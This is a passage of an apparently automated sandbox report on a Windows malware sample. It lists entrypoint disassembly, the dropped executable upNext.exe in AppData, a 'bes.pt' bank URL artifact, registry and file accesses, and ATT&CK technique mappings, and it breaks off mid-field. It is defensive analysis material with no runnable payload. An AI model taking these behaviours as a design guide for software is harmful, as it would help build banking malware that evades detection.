"\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"upNext.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A48282.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"upNext.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"DISMHOST.EXE.67A48282.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"bes.pt\" (Source: 00000000-00002104.00000001.77539.003D0000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00002104.00000001.77539.003D0000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt\" (Source: 00000000-00006072.00000001.68052.00250000.00000004.mdmp, 00000000-00006072.00000002.69975.00250000.00000004.mdmp, 00000000-00006072.00000003.75500.00250000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00006072.00000001.68052.00250000.00000004.mdmp, 00000000-00006072.00000002.69975.00250000.00000004.mdmp, 00000000-00006072.00000003.75500.00250000.00000004.mdmp, Indicator: \"bes.pt\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"upNext.exe\" - Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00006072]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" was detected as \"Borland Delphi 4.0\"\n \"upNext.tmp\" was detected as \"Borland Delphi 4.0\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" was detected as \"Borland Delphi 4.0\"\n \"DISMHOST.EXE.67A48282.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\version.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\version.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe.Local\\\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\comctl32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\SHFolder.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to touch file \"C:\\Windows\\system32\\SHFolder.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe.Local\\\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.ENU\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.EN\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" writes file \"c:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\upnext.exe\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" writes file \"%localappdata%\\upnext.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" connecting to \"\\ThemeApiPort\"\n \"upNext.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0FDECBAEB68D2B916735AD041C7B568D88941926D04A39ACF34ED98E0305EA1A\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"CATEGORY\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"NAME\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"PARENTFOLDER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\" - Location: [C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp]- [targetUID: 00000000-00006072]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A48282.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00006072]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\version.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\SHFolder.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.ENU.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.EN.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\olepro32.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" reads file \"c:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" reads file \"c:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL 